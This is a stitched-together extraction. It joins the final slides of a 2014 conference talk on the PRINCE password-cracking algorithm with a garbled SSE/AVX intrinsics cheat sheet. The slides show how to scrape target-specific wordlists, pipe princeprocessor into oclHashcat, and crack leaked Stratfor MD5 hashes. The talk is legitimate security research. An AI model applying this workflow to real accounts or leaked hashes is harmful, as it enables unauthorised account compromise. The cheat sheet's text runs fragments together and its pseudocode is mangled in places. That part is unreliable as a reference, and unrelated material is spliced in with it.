1 + 1 + 2 45 *  45 * 335 678,375
1 + 1 + 1 + 1 45 *  45 *  45 *  45 4,100,625
08.12.2014 Jens Steube -PRINCE algorithm 27
Keyspace selection, general
•Sorting by lowest keyspace creates the 
floating effect inside the prince attack -mode:
–Wordlist 
–Hybrid
–Keyboard walks / Passphrases
–Brute -Force + Markov
08.12.2014 Jens Steube -PRINCE algorithm 28
Candidate output length selection
•The Algorithm has to 
chose the order of the 
output length for 
candidates
•Word -length 
distribution in a 
wordlist is a known 
structure
•The algorithm recreates 
its own stats from the 
input wordlisthttp ://blog.erratasec.com/
08.12.2014 Jens Steube -PRINCE algorithm 29

Personal aspects
•To make use of this feature, you need a 
specific wordlist
–Use a tool like wordhound to compile such a 
wordlist ( grabs data from URL, twitter, reddit, etc)
•Cookbook phase:
–Decide yourself if you want to use the raw list or
•Preprocess the wordlist with some rules applied
•Mix in like top 10k from rockyou
•Mix in some single chars for late BF
08.12.2014 Jens Steube -PRINCE algorithm 30
Problems of the attack
•Elements in the wordlist 
requires all lengths
•Chain -count for long 
outputs
•Generated dupes
08.12.2014 Jens Steube -PRINCE algorithm 31
Problems of the attack
•Elements in the wordlist 
requires all lengths
•Chain -count for long 
outputs
•Generated dupes•For calculation length 
distribution
08.12.2014 Jens Steube -PRINCE algorithm 32
Problems of the attack
•Elements in the wordlist 
requires all lengths
•Chain -count for long 
outputs
•Generated dupes•Can be suppressed with 
divisor parameter
08.12.2014 Jens Steube -PRINCE algorithm 33
Problems of the attack
•Elements in the wordlist 
requires all lengths
•Chain -count for long 
outputs
•Generated dupes
08.12.2014 Jens Steube -PRINCE algorithm 34
Princeprocessor internal
•Load words from wordlist
•Store words in memory
•Generate element chains for each password length
–Reject chains that does include an element which points to 
a non -existing password length
•Sort chained -elements by keyspace of the chain
•Iterate through keyspace (mainloop )
–Select the next chain of that password length
–Generate password with chain
–Print
Jens Steube -PRINCE algorithm 08.12.2014 35
PRINCE ATTACKUsage
Jens Steube -PRINCE algorithm 08.12.2014 36
How to use it from users view
•Download princeprocessor
•Choose an input wordlist which could be:
–One of your favourite wordlist ( rockyou , etc...)
–Target -specific optimized wordlist
•Pipe princeprocessor to your cracker
–./pp64 < wordlist.txt | ./ oclHashcat hash.txt
Jens Steube -PRINCE algorithm 08.12.2014 37
How to use it from users view
•Optionally 
–Choose password min / max length
–Choose character classes to pass / filter
–Choose start / stop range -> Distributed
–Choose minimum element length
–Choose output file, otherwise written to STDOUT
Jens Steube -PRINCE algorithm 08.12.2014 38
LIVE DEMO 1
•Wordlist
–Top 100k of rockyou.txt
•Hashlist
–Public leak „stratfor“, 822k raw MD5 hashes
•Preparation
–Removing raw dictionary hits first
Jens Steube -PRINCE algorithm 08.12.2014 39
LIVE DEMO 2
•Wordlist
–Generated by scraping stratfor site
•Hashlist
–Public leak „stratfor“, 822k raw MD5 hashes
•Preparation
–Removing raw dictionary hits first
08.12.2014 Jens Steube -PRINCE algorithm 40
PRINCEPROCESSOR V0.10 RELEASEDownload from: https://hashcat.net/tools/princeprocessor/
-Linux
-Windows
-OSX
08.12.2014 Jens Steube -PRINCE algorithm 41
THANKS! QUESTIONS?Email: jens.steube@gmail.com
IRC: freenode #hashcat
Jens Steube -PRINCE algorithm 08.12.2014 42Bit Operations
Bit Shifting & Rotation
Bit Counting
Specials
Transactional 
MemoryComparisons
String CompareOverview
Each intrinsic is only available on machines which support the 
corresponding instruction set. This list depicts the instruction sets 
and the first Intel and AMD CPUs that supported them.The following data types are used in the signatures of the intrinsics. 
Note that most types depend on the used type suffix and only one 
example suffix is shown in the signature.Most intrinsics are available for various suffixes which depict different 
data types. The table depicts the suffixes used and the corresponding 
SSE register types (see Data Types for descriptions). Arithmetics
MiscellaneousRegister I/O
Misc I/OConversions
Reinterpet Casts Packed Conversions
Single Element Conversion
Bit MaskingSelective Bit MovingBoolean Logic
Bit CompareFloat CompareComposite ArithmeticsBasic Arithmetics
Sign 
Modification
Compwosite Int Arithmetics Dot ProductDiv/Sqrt/ReciprocalRounding
Byte Manipulation
Byte MovementLoad
Store
Fused Multiply and AddAddition / SubtractionMultiplication
Fences
Unaligned LoadAligned Load
Storing data from an SSE register into memory or registers
Unaligned StoreAligned Store
Special AlgorithmsByte ZeroingByte ShufflingChange the byte order using a control maskSet Register
Mix Registers
BroadcastAbsolute
absAdd
addAdd with 
Saturation
addsAlternating Add 
and Subtract
addsub SSE3SSE2 SSE2
SSSE3Bool AND
and
si128,ps[SSE],pd
epi8-32epi8-64,ps[SSE]/d,
ss[SSE]/depi8-16,epu8-16 ps/d
ps/d Packed single float / packed double float
epiX Packed X bit signed integer
epuX Packed X bit unsigned integer
ss/dSingle single float/double float, remaining bits 
copied. Operations involving these types often 
have different signatures: An extra input register 
is used and all bits which are not used by the 
single element are copied from this register. The 
signatures are not depicted here; see manual for 
exact signatures. siXSingle X bit signed integer. If there is a si128 
version, the same function for 256 bits is usually 
suffixed with si256.Bool NOT AND
andnot
si128,ps[SSE],pd
Blend
blend[v]SSE4.1
epi8-16,
epi32[AVX2],ps/d
mi blend_epi16
(mi a,mi b,ii imm)
FOR j := 0 to 7
 i := j*16
 IF imm[j]
  dst[i+15:i] := b[i+15:i]
 ELSE
  dst[i+15:i] := a[i+15:i]NOTE: blendv uses 128bit 
mask, blend uses 
immediate
Byteshift
left/right
[b]sl/rli SSE2
si128,epi128[256]md cvtsi64_sd(md a,i64 b)
double(b[63:0]) |
(a[127:64] << 64)128bit Cast
castX_Y SSE2
si128,ps/d
NOTE: Reinterpret casts 
from X to Y. No operation is 
generated.Round up 
(ceiling)
ceil SSE4.1
ps/d,ss/d
Cache Line 
Flush
clflush SSE2
-
NOTE: Flushes cache line 
that contains p from all 
cache levels
Float 
Compare
cmp[n]Z
ps/d,ss/dSSE2Compare Not 
NaN
cmp[un]ord
ps/d,ss/d
NOTE: For each element pair 
cmpord sets the result bits 
to 1 if both elements are not 
NaN, otherwise 0. 
cmpunord sets bits if at 
least one is NaN.SSE2Old Float/Int 
Conversion
cvt[t]_X2Y SSE
pi↔ps,si↔ss
NOTE: Converts X to Y. 
Converts between int and 
float. p_  versions convert 2-
packs from b and fill result 
with upper bits of operand 
a. s_ versions do the same 
for one element in b. 
The t version truncates 
instead of rounding and is 
available only when 
converting from float to int.Sign Extend
cvtX_Y
epi8-32
NOTE: Sign extends each 
element from X to Y. Y must 
be longer than X.SSE4.1S/D/I32 
Conversion
cvt[t]X_Y
epi32,ps/d
NOTE: Converts packed 
elements from X to Y. If pd is 
used as source or target 
type, then 2 elements are 
converted, otherwise 4.
The t version is only 
available when casting to int 
and performs a truncation 
instead of rounding.SSE2Zero Extend
cvtX_Y
epu8-32 → epi8-32
NOTE: Zero extends each 
element from X to Y. Y must 
be longer than X.SSE4.1
Compare 
Single Float
[u]comiZ
ss/dSSE2
NOTE: Z can be one of:
eq/ge/gt/le/lt/neq
Returns a single int that is 
either 1 or 0. The u version 
does not signal an exception 
for QNaNs and is not 
available for 256 bits!NOTE: Z can be one of:
ge/le/lt/gt/eq
The n version is a not 
version, e.g., neq computes 
not equal. Elements that 
compare true receive 1s in 
all bits, otherwise 0s.Single Conversion 
to Float with Fill
cvtX_Y
si32-64,ss/d → ss/d
NOTE: Converts a single 
element in b from X to Y. 
The remaining bits of the 
result are copied from a.SSE2Single Float to 
Int Conversion
cvt[t]X_Y
ss/d → si32-64
NOTE: Converts a single 
element from X (int) to Y 
(float). Result is normal int, 
not an SSE register!
The t version performs a 
truncation instead of 
rounding.Single 128-bit 
Int Conversion
cvtX_Y
si32-128
NOTE: Converts a single 
integer from X to Y. Either of 
the types must be si128. If 
the new type is longer, the 
integer is zero extended.SSE2Single SSE Float 
to Normal Float 
Conversion
cvtX_Y
ss→f32,sd→f64
NOTE: Converts a single SSE 
float from X (SSE Float type) 
to Y (normal float type). SSE2 SSE
Div
div SSE2
ps/d,ss/d
Conditional 
Dot Product
dp
ps/d
NOTE: Computes the dot 
product of two vectors. A 
mask is used to state which 
components are to be 
multiplied and stored.
m dp_ps(m a,m b,ii imm)
FOR j := 0 to 3
 IF imm[4+j]
  tmp[i+31:i] :=
   a[i+31:i] * b[i+31:i]
 ELSE
  tmp[i+31:i] := 0
sum[31:0] := 
tmp[127:96] + tmp[95:64] 
+ tmp[63:32]+ tmp[31:0]
FOR j := 0 to 3
 IF imm[j]
  dst[i+31:i] :=sum[31:0]
 ELSE
  dst[i+31:i] := 0SSE4.1Round down 
(floor)
floor SSE4.1
ps/d,ss/d
Horizontal 
Add
hadd
epi16-32,ps/dSSSE3
NOTE: Adds adjacent pairs of 
elementsHorizontal Add 
with Saturation
hadds
epi16SSSE3
NOTE: Adds adjacent pairs of 
elements with saturation
Horizontal 
Subtract
hsub
epi16-32,ps/dSSSE3
NOTE: Subtracts adjacent 
pairs of elementsHorizontal Subtract 
with Saturation
hsubs
epi16SSSE3
NOTE: Subtracts adjacent pairs 
of elements with saturationInsert
insert
epi16[SSE2],
epi8-64,ps
mi insert_epi16
(mi a,i i,ii p)
dst[127:0] := a[127:0]
sel := p[2:0]*16
dst[sel+15:sel]:=i[15:0]NOTE: Inserts an element i 
at a position p into a. SSE4.1
Fast Load 
Unaligned 
lddqu
si128
NOTE: Loads 128bit integer 
data into SSE register. Is 
faster than loadu if value 
crosses cache line boundary. 
Should be preferred over 
loadu. SSE3Load Fence
lfence
-
NOTE:  Guarantees that every 
load instruction that 
precedes, in program order, 
is globally visible before any 
load instruction which follows 
the fence in program order.SSE2
Broadcast 
Load
load1
pd,ps
NOTE:  Loads a float from 
memory into all slots of the 
128-bit register.
For pd, there is also the 
operation loaddup in SSE3 
which may perform faster 
than load1.SSE2Load Aligned
load
pd,ps,si128
NOTE:  Loads 128 bit from 
memory into register. 
Memory address must be 
aligned!SSE2
Load Single 
load
ss,sd,epi64
NOTE:  Loads a single 
element from memory and 
zeros remaining bytes. For 
epi64, the command is 
loadl_epi64!SSE2Load 
High/Low
loadh/l
pd,pi
NOTE:  Loads a value from 
memory into the high/low 
half of a register and fills the 
other half from a.SSE2
md loadl_pd(md a,d* ptr)
dst[63:0] :=*(ptr)[63:0]
dst[127:64] := a[127:64]Load Reversed
loadr
pd,ps
NOTE:  Loads 128 bit from 
memory into register. The 
elements are loaded in 
reversed order. Memory 
must be aligned!SSE2
m loadr_ps(f* ptr)
dst[31:0]:=*(ptr)[127:96]
dst[63:32]:=*(ptr)[95:64]
dst[95:64]:=*(ptr)[63:32]
dst[127:96]:=*(ptr)[31:0]
Load 
Unaligned
loadu
pd,ps,si16-si128
NOTE:  Loads 128 bit or less 
(for si16-64 versions) from 
memory into the low-bits of 
a register.SSE2
Multiply and 
Horizontal Add
madd
epi16SSSE3
NOTE: Multiply 16-bit ints 
producing a 32-bit int and 
add horizontal pairs with 
saturation producing 
4x32-bit intsSSE3Multiply and 
Horizontal Add
maddubs
epi16
NOTE: Adds vertical 8 bit ints 
producing a 16 bit int and 
adds horizontal pairs with 
saturation producing 8x16 bit 
ints. The first input is treated 
as unsigned and the second as 
signed. Results and 
intermediaries are signed.
Masked Store 
maskmoveu
si128
NOTE:  Stores bytes into 
memory if the corresponding 
byte in mask has its highest 
bit set.SSE2
v maskmoveu_si128
(mi a,mi mask,c* ptr)Memory Fence 
(Load & Store)
mfence
-
NOTE: Guarantees that 
every memory access that 
precedes, in program order, 
the memory fence 
instruction is globally visible 
before any memory 
instruction which follows the 
fence in program order.SSE2
Monitor 
Memory
monitor
-
NOTE: Arm address 
monitoring hardware using 
the address specified in p. A 
store to an address within the 
specified address range 
triggers the monitoring 
hardware. Specify optional 
extensions in e, and optional 
hints in h.SSE3
v monitor(v* ptr,u e,u h)Move Element 
with Fill
move
ss[SSE],sd
NOTE:  Moves the lowest 
element from first input and 
fills remaining elements 
from second inputSSE2SSE
m move_ss(m a,m b)
a[31:0] | b[127:32]
Zero High
move
epi64
NOTE:  Moves lower half of 
input into result and zero 
remaining bytes.SSE2
mi move_epi64(mi a)
a[63:0]Move 
High↔Low
movelh/hl
ps
NOTE:  The lh version 
moves lower half of b into 
upper half of result. Rest is 
filled from a. The hl version 
moves upper half to lower 
half.
m movehl_ps(m a,m b)
64-bit 
Broadcast
movedup
pd
NOTE:  Duplicates the lower 
half of a.
md movedup_pd(md a)
a[0:63]|(a[63:0]<<64)
32-bit Broadcast 
High/Low
movel/hdup
ps
NOTE:  Duplicates 32bits into 
the lower 64bits of the 
result. l version duplicates 
bits [31:0], h version 
duplicates bits [63,32].SSE3SSE3SSEMovemask
movemask
epi8,pd,ps[SSE]
NOTE:  Creates a bitmask 
from the most significant bit 
of each element.SSE2
i movemask_epi8(mi a)
Sum of Absolute 
Differences 2
sadbw SSE4.1
epu8
NOTE: Compute the sum of 
absolute differences (SADs) of 
quadruplets of unsigned 8-bit 
integers in a compared to those 
in b, and store the 16-bit results. 
Eight SADs are performed using 
one quadruplet from b and eight 
quadruplets from a. One 
quadruplet is selected from b 
starting at on the offset specified 
in imm. Eight quadruplets are 
formed from sequential 8-bit 
integers selected from a starting 
at the offset specified in imm.
mi sadbw_epu8
(mi a,mi b,ii imm)
 a_offset := imm[2]*32
 b_offset := imm[1:0]*32
 FOR j := 0 to 7
  i := j*8
  k := a_offset+i
  l := b_offset
  dst[i+15:i] := 
ABS(a[k+7:k]-b[l+7:l])+
ABS(a[k+15:k+8]-b[l+15:l+8])+                       
ABS(a[k+23:k+16]-b[l+23:l+16])+                       
ABS(a[k+31:k+24]-b[l+31:l+24])Mul
mul SSE2
epi32[SSE4.1],epu32,
ps/d,ss/d
suX Single X bit unsigned integer in SSE registerSSE
NOTE: epi32 and epu32 
version multiplies only 2 ints 
instead of 4!Mul Low
mulloSSE2
epi16,epi32[SSE4.1]
NOTE: Multiplies vertically 
and writes the low 16/32 
bits into the result.SSE4.1Mul High
mulhi SSE2
epi16,epu16
NOTE: Multiplies vertically 
and writes the high 16bits 
into the result.Mul High with 
Round & Scale
mulhrs
epi16
NOTE: Treat the 16-bit 
words in registers A and B as 
signed 15-bit fixed-point 
numbers between −1 and 1 
(e.g. 0x4000 is treated as 0.5 
and 0xa000 as −0.75), and 
multiply them together.SSSE3
Monitor Wait
mwait
-
NOTE: Hint to the processor 
that it can enter an 
implementation-dependent-
optimized state while waiting 
for an event or store 
operation to the address 
range specified by MONITOR.SSE3Get MXCSR 
Register
getcsr
-
NOTE: Get the content of the 
MXCSR register.SSEBool OR
or
si128,ps[SSE],pdSSE2SSE
SSE2SSE
SSE2SSEPack With 
Saturation
pack[u]s
epi16,epi32
NOTE: Packs ints from two 
input registers into one 
register halving the bitwidth. 
Overflows are handled using 
saturation. The u version 
saturates to the unsigned 
integer type.SSE2
Pause
pause SSE2
-
NOTE: Provide a hint to the 
processor that the code 
sequence is a spin-wait loop. 
This can help improve the 
performance and power 
consumption of spin-wait 
loops.Prefetch
prefetch
-
NOTE: Fetch the line of data 
from memory that contains 
address ptr to a location in 
the cache heirarchy specified 
by the locality hint i.SSE
Approx.
Reciprocal
rcp
ps,ssSSERound
round SSE4.1
ps/d,ss/d
NOTE: Rounds according to a 
rounding paramater r.
Approx. 
Reciprocal Sqrt
rsqrt
ps,ssSSE
NOTE: Approximates 1.0/sqrt(x)
Sum of Absolute 
Differences
sad
epu8
NOTE: Compute the absolute 
differences of packed 
unsigned 8-bit integers in a 
and b, then horizontally sum 
each consecutive 8 
differences to produce two 
unsigned 16-bit integers, and 
pack these unsigned 16-bit 
integers in the low 16 bits of 
64-bit elements in dst.SSE2Replicate
set1
epi8-64x,ps[SSE]/d
NOTE:  Broadcasts one input 
element into all slots of an 
SSE register.SSE2Set
set
epi8-64x,
ps[SSE]/d,ss/d,
m128/m128d/i[AVX]
NOTE:  Sets and returns an 
SSE register with input 
values. E.g., epi8 version 
takes 16 input parameters. 
The first input gets stored in 
the highest bits. For epi64, 
use the epi64x suffix.SSE2
Set MXCSR 
Register
setcsr
-
NOTE: Set the MXCSR register 
with a 32bit int.SSESet Reversed
setr
epi8-64x,ps[SSE]/d,
m128/m128d/i[AVX]
NOTE:  Sets and returns an SSE 
register with input values. The 
order in the register is 
reversed, i.e. the first input 
gets stored in the lowest bits. 
For epi64, use the epi64x 
suffix.SSE2
Zero Register
setzero
ps[SSE]/d,si128
NOTE:  Returns a register 
with all bits zeroed.Store Fence
sfence
-
NOTE:  Guarantees that every 
store instruction that 
precedes, in program order, is 
globally visible before any 
store instruction which follows 
the fence in program order.SSE
Byte Shuffle
shuffle
epi8
NOTE:  Shuffle packed 8-bit 
integers in a according to 
shuffle control mask in the 
corresponding 8-bit element 
of b, and store the results in 
dst.
mi shuffle_epi8(mi a,mi b)
FOR j := 0 to 15
 i := j*8
 IF b[i+7] == 1
  dst[i+7:i] := 0
 ELSE
  k := b[i+3:i]*8
  dst[i+7:i]:= a[k+7:k]SSSE3
Dual Register 
Float Shuffle
shuffle
ps[SSE],pd
NOTE:  Shuffles floats from 
two registers. The lower part 
of the result receives values 
from the first register. The 
upper part receives values 
from the second register. 
Shuffle mask is an 
immediate!
md shuffle_pd
(md a,md b,ii i)
dst[63:0]:= (i[0] == 0) ? 
   a[63:0] : a[127:64]
dst[127:64]:= (i[1] == 0) ?
   b[63:0] : b[127:64]SSE2SSE32-bit Int 
Shuffle
shuffle
epi32
NOTE:  Shift input register 
left/right by i bytes while 
shifting in zeros. There is no 
difference between the b 
and the non-b version. mi shuffle_epi32(mi a,ii i)
S(s, mask){
 CASE(mask[1:0])
  0: r := s[31:0]
  1: r := s[63:32]
  2: r := s[95:64]
  3: r := s[127:96]
 RETURN r[31:0]
}
dst[31:0]:=S(a,i[1:0])
dst[63:32]:=S(a,i[3:2])
dst[95:64]:=S(a,i[5:4])
dst[127:96]:=S(a,i[7:6])SSE2High / Low 
16bit Shuffle
shufflehi/lo
epi16
NOTE:  Shuffles the high/low 
half of the register using an 
immediate control mask. 
Rest of the register is copied 
from input. 
mi shufflehi_epi16
(mi a,ii i)
dst[63:0] := a[63:0]
dst[79:64] := 
(a >> (i[1:0]*16))[79:64]
dst[95:80] := 
(a >> (i[3:2]*16))[79:64]
dst[111:96] := 
(a >> (i[5:4]*16))[79:64]
dst[127:112] := 
(a >> i[7:6]*16))[79:64]SSE2Conditional 
Negate or Zero
sign SSSE3
epi8-32
NOTE: For each element in a 
and b, set result element to 
a if b is positive, set result 
element to -a if b is 
negative or set result 
element to 0 if b is 0. Logic Shift 
Left/Right
sl/rl[i] SSE2
epi16-64
NOTE: Shifts elements left/
right while shifting in zeros. 
The i version takes an 
immediate as count. The 
version without i  takes the 
lower 64bit of an SSE 
register.
Square Root
sqrt SSE2
ps/d,ss/dSSEArithmetic 
Shift Right
sra[i] SSE2
epi16-64
NOTE: Shifts elements right 
while shifting in sign bits. 
The i version takes an 
immediate as count. The 
version without i  takes the 
lower 64bit of an SSE 
register.
m addsub_ps(m a,m b)
FOR j := 0 to 3
 i := j*32
 IF (j is even) 
  dst[i+31:i] := 
   a[i+31:i] - b[i+31:i]
 ELSE
  dst[i+31:i] :=
   a[i+31:i] + b[i+31:i]See also: Conversion to int 
performs rounding implicitly
Broadcast 
Store
store1
pd,ps[SSE]
NOTE:  Stores a float to 128-
bits of memory replicating it 
two (pd) or four (ps) times. 
Memory location must be 
aligned!SSE2SSEAligned Store
store
si128,pd,ps[SSE],
si256[AVX]
NOTE:  Stores 128-bits into 
memory. Memory location 
must be aligned!SSE2SSE
Single Element
 Store
store[l]
ss[SSE],sd,epi64
NOTE:  Stores the low element 
into memory. The l version 
must be used for epi64 and 
can be used for pd.SSE2SSE
v store_sd(d* ptr,md a)Store High
storeh
pd
NOTE:  Stores the high 64bits 
into memory.SSE2
v storeh_pd(v* ptr,m a)Aligned Reverse
 Store
storer
pd,ps[SSE]
NOTE:  Stores the elements 
from the register to memory 
in reverse order. Memory 
must be aligned!SSE2SSE
v storer_pd(d* ptr,md a)
Unaligned 
Store
storeu
si16-128,pd,ps[SSE],
si256[AVX]
NOTE:  Stores 128 bits (or 
less for the si16-64 versions) 
into memory.SSE2SSE
v storeu_pd(v* ptr,m a)Stream Load
stream_load
si128,si256[AVX]
NOTE:  Loads 128 bit from 
memory into register. 
Memory address must be 
aligned! Memory is fetched 
at once from an USWC 
device without going 
through the cache hierachy. SSE2
Aligned 
Stream Store
stream
si32-128,pd,ps[SSE],
si256[AVX]
NOTE:  Stores 128-bits (or 32-
64) for si32-64 integer a 
into memory using a non-
temporal hint to minimize 
cache pollution. Memory 
location must be aligned!SSE2SSE
v stream_si32(i* p,i a)
v stream_si128(mi* p,mi a)Subtract
subSubtract with 
Saturation
subs SSE2epi8-64,ps[SSE]/d,
ss[SSE]/d epi8-16,epu8-16SSE SSE
SSE2SSE
i testc_si128(mi a,mi b)
ZF := ((a & b) == 0)
CF := ((a & !b) == 0)
RETURN CF;Test And Not/
And
testc/z
si128[SSE4.1],
si256,ps/d
NOTE: Compute the bitwise 
AND of 128 bits in a and b, and 
set ZF to 1 if the result is zero, 
otherwise set ZF to 0. 
Compute the bitwise AND NOT 
of a and b, and set CF to 1 if 
the result is zero, otherwise 
set CF to 0. The c version 
returns CF and the z version 
ZF. For 128 bit, there is also 
test_all_zeros which does 
the same as testz_si128.SSE4.1
i  test_mix_ones_zeros
(mi a,mi b)
ZF := ((a & b) == 0)
CF := ((a & !b) == 0)
RETURN !CF && !ZF;Test Mix Ones 
Zeros
test_ncz
si128[SSE4.1],
si256,ps/d
NOTE: Compute the bitwise 
AND of 128 bits in a and b, 
and set ZF to 1 if the result is 
zero, otherwise set ZF to 0. 
Compute the bitwise AND 
NOT of a and b, and set CF to 
1 if the result is zero, 
otherwise set CF to 0. Return 
!CF && !ZF. For 128 bit, 
there is also the operation 
test_mix_ones_zeros which 
does the same.SSE4.1
i test_all_ones(mi a)
(~a) == 0Test All Ones
test_all_ones
-
NOTE: Returns true iff all bits 
in a are set. Needs two 
instructions and may be 
slower than native 
implementations.SSE4.1Interleave 
(Unpack)
unpackhi/lo
epi8-64,ps[SSE],pd
NOTE: Interleaves elements 
from the high/low half of 
two input registers into a 
target register. SSE2
mi unpackhi_epi32(mi a,mi b)
dst[31:0]  := a[95:64] 
dst[63:32] := b[95:64] 
dst[95:64] := a[127:96] 
dst[127:96]:= b[127:96] Bool XOR
xor
si128,ps[SSE],pdSSE2SSE
mi andnot_si128(mi a,mi b)
!a & b
+S0
0+
+ABS(a-b)+S+S+S
*
+S*
**+S
............
AVX2Broadcast 
Load
broadcast
ss/d,ps/d
NOTE:  Broadcasts one input 
(ss/d) element or 128bits 
(ps/d) from memory into all 
slots of an SSE register. All 
suffixes but ss are only 
available in 256 bit mode!AVX
Broadcast
broadcastX
epi8-64,ps/d,si256
NOTE:  Broadcasts the 
lowest element into all slots 
of the result register. The 
si256 version broadcasts one 
128bit element! The letter X 
must be the following:
epi8: b, epi16: w, epi32: d, 
epi64:q, ps: s, pd: d, 
si256: si128AVX2128/256bit 
Cast
castX_Y
pd128↔pd256,
ps128↔ps256,
si128↔si256
NOTE: Reinterpret casts 
from X to Y. If cast is from 
128 to 256 bit, then the 
upper bits are undefined! No 
operation is generated.AVX256
256bit Cast
castX_Y
ps,pd,si256
NOTE: Reinterpret casts 
from X to Y. No operation is 
generated.AVX256
Compare
cmp
ps/d,ss/d
NOTE: Compares packed or 
single elements based on 
imm. Possible values are 0-31 
(check documentation). 
Elements that compare true 
receive 1s in all bits, 
otherwise 0s.AVX128 128128
128 128 128 128
Gather
i32/i64gather
epi32-64,ps/d
NOTE:  Gather elements from 
memory using 32-bit/64-bit 
indices. The elements are 
loaded from addresses 
starting at ptr and offset by 
each 32-bit/64-bit  element in 
a (each index is scaled by the 
factor in s). Gathered 
elements are merged into dst. 
s should be 1, 2, 4 or 8. The 
number of gathered elements 
is limited by the minimum of 
the type to load and the type 
used for the offset.AVX2
mi i64gather_epi32
(i* ptr,mi a,i s)
FOR j := 0 to 1;
 i := j*32
 m := j*64
 dst[i+31:i] := 
   *(ptr + a[m+63:m]*s])
dst[MAX:64] := 0Mask Gather
mask_i32/i64gather
epi32-64,ps/d
NOTE:  Same as gather but 
takes an additional mask and 
src register. Each element is 
only gathered if the highest 
corresponding bit in the mask 
is set. Otherwise it is copied 
from src.AVX2
mi mask_i64gather_epi32
(mi src,i* ptr,mi a,
 mi mask,i32 s)
FOR j := 0 to 1; 
 i := j*32
 m := j*64
 IF mask[i+31]
  dst[i+31:i]:=
      *(ptr+a[i+63:i]*s)
  mask[i+31] := 0
 ELSE
  dst[i+31:i] := 
      src[i+31:i]
mask[MAX:64] := 0
dst[MAX:64] := 0
256bit Insert
insertf128
si256,ps/d
m insertf128_ps
(m a,m b,ii i)
dst[255:0] := a[255:0]
sel := i*128
dst[sel+15:sel]:=b[127:0]NOTE: Inserts 128bit at a 
position specified by i. For 
AVX2, there is only si256 
and the operation is named 
inserti128.AVX2AVX256128
128 128
128128
128bit Pseudo 
Gather
loadu2
m128,m128d,m128i
NOTE:  Loads two 128bit 
elements from two memory 
locations.AVX256m128,
m128d,
m128iAVX sometimes uses this suffix for 128bit float/
double/int operations. SEQ!
m loadu2_m128(f* p1,f* p2)
dst[127:0] = *p2;
dst[255:128] = *p1;
SEQ!Mask Load
maskload
ps/d,epi32-64[AVX2]
NOTE:  Loads from memory 
if the highest bit for each 
element is set in the mask. 
Otherwise 0 is used. ptr 
must be aligned!AVX
mi maskload_epi64
(i64* ptr,mi mask)
dst[MAX:128] := 0
FOR j := 0 to 1
 i := j*64
 IF mask[i+63]
  dst[i+63:i]:= *(ptr+i)
 ELSE
  dst[i+63:i]:= 0AVX2
SEQ!SEQ!
Masked Store 
maskstore
ps/d,epi32-64[AVX2]
NOTE:  Stores bytes from a 
into memory at p if the 
corresponding byte in the 
mask m has its highest bit 
set. Memory must be 
aligned!
v maskstore_ps(f* p,mi m,m a)
128AVX2AVX128 128
Float Shuffle
permute[var]
ps/d
NOTE:  128-bit version is the 
same as int shuffle for floats. 
256-bit version performs the 
same operation on two 128-
bit lanes. The normal version 
uses an immediate and the 
var version a register b (the 
lowest bits in each element 
in b are used for the mask of 
that element in a).AVX
m permutevar_ps(m a,mi b)4x64bit 
Shuffle
permute4x64
epi64,pd
NOTE:  Same as float shuffle 
but no [var] version is 
available. In addition, the 
shuffle is performed over the 
full 256 bit instead of two 
lanes of 128 bit.
md permute4x64_pd(md a,ii i)128-bit Dual 
Register Shuffle
permute2f128
ps/d,si256
NOTE:  Takes 2 registers and 
shuffles 128 bit chunks to a 
target register. Each chunk 
can also be cleared by a bit 
in the mask. For AVX2, there 
is only the si256 version 
which is renamed to 
permute2x128.AVX
md permute2f128_pd
(md a,md b,ii i)
S(s1, s2, control){
 CASE(control[1:0])
 0: tmp[127:0]:=s1[127:0]
 1: tmp[127:0]:=s1[255:128]
 2: tmp[127:0]:=s2[127:0]
 3: tmp[127:0]:=s2[255:128]
 IF control[3]
  tmp[127:0] := 0 
 RETURN tmp[127:0]
}
dst[127:0]  :=S(a,b,i[3:0])
dst[255:128]:=S(a,b,i[7:4])
dst[MAX:256]:=0256
AVX2
2568x32bit 
Shuffle
permutevar8x32
epi32,ps
NOTE:  Same as 4x64 bit 
shuffle but with 8x32bit and 
only a [var] version taking a 
register instead of an 
immediate is available.256AVX2
AVX2SEQ!
AVXSEQ! SEQ!
AVXVariable Logic 
Shift
sl/rlv
epi32-64
NOTE: Shifts elements left/
right while shifting in zeros. 
Each element in a is shifted 
by an amount specified by 
the corresponding element 
in b.AVX2Variable 
Arithmetic Shift
sl/rav
epi32-64
NOTE: Shifts elements left/
right while shifting in sign 
bits. Each element in a is 
shifted by an amount 
specified by the 
corresponding element in b.AVX2
SEQ! 128 128
128SEQ!
128128bit Pseudo
Scatter
storeu2
m128,m128d,m128i
NOTE:  Stores two 128bit 
elements into two memory 
locations.AVX256 SEQ!
v storeu2_m128
(f* p,f* q,m a)
*p = dst[127:0];
*q = dst[255:128];
128
AVX AVXGet Undefined 
Register
undefined
ps/d,si128-256
NOTE:  Returns an SSE 
register with undefined 
contents.AVX
Zero All 
Registers
zeroall
-
NOTE:  Zeros all SSE/AVX 
registers.AVX256
Zero High All 
Registers
zeroupper
-
NOTE:  Zeros all bits in 
[MAX:256] of all SSE/AVX 
registers.AVX256
String Compare 
Mask
cmpi/estrm
ps/d,ss/d
NOTE: Compares strings a and 
b and returns the comparsion 
mask. If _SIDD_BIT_MASK is 
used, the resulting mask is a 
bit mask. If _SIDD_UNIT_MASK is 
used, the result is a byte mask 
which has ones in all bits of 
the bytes that do not match. SSE4.2Data Type Suffixes
Each operation has an i and an e version. The i version compares 
all elements, the e version compares up to specific lengths la and 
lb. The immediate value i for all these comparisons consists of 
bit flags. Exactly one flag per group must be present:
String Compare 
Index
cmpi/estri
ps/d,ss/d
NOTE: Compares strings in a 
and b and returns the index 
of the first byte that 
matches. Otherwise Maxsize 
is returned (either 8 or 16 
depending on data type).SSE4.2String 
Compare
cmpi/estrc
ps/d,ss/d
NOTE: Compares strings in a 
and b and returns true iff the 
resulting mask is not zero, 
i.e., if there was a match.SSE4.2String 
Nullcheck
cmpi/estrs/z
ps/d,ss/d
NOTE: Compares two strings 
a and b and returns if a (s 
version) or b (z version) 
contains a null character.SSE4.2
i cmpistrs(mi a,mi b,ii i)
i cmpestrs
(mi a,i la,mi b,i lb,ii i)String Compare 
with Nullcheck
cmpi/estra
ps/d,ss/d
NOTE: Compares strings in a 
and b and returns true iff the 
resulting mask is zero and 
there is no null character in b.SSE4.2cmpistrX(mi a, mi b, ii i)
cmpestrX(mi a, i la, mi b, i lb, ii i)
_SIDD_UBYTE_OPS unsigned 8-bit chars
_SIDD_UWORD_OPS unsigned 16-bit chars
_SIDD_SBYTE_OPS signed 8-bit chars
